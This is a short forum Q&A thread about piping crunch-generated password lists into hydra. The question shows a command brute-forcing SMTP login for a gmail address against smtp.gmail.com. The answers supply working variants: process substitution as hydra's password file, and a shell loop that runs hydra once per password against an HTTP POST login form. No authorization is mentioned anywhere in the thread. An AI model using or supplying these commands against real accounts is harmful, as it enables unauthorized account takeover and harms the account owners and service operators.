# Piping crunch into hydra

Tags: hydra, crunch

Is it possible to pipe the output from crunch into hydra ?

I tried this, but it doesn't work:

```
crunch 1 6 123456 --stdout | hydra -S -l ---------@gmail.com -v -V -e nsr -s 465 smtp.gmail.com smtp
```

Answer (score 1):

I think, after a few searches, that it's not possible as hydra doesn't read stdin by design, and there are no options to use in order to achieve this.

But it can be a great improvement indeed.

Answer (score 0):

You should be able to use process substitution in bash or zsh, as long as  Hydra doesn't need to seek in the password file:

```
 hydra -S -l ---------@gmail.com -P <(crunch 1 6 123456 --stdout) -v -V -e nsr -s 465 smtp.gmail.com smtp
```

Comment: have you tried it, or is this an idea?

Answer (score 0):

```
for x in $(crunch 1 2 abc); do hydra -l admin -p $x <ip> http-post "<form_info>"; done
```

you can do substitution like this and it will re-run hydra for every password generated (not very good for cpu utilization but it will work).Also the wordlist must be smaller than RAM available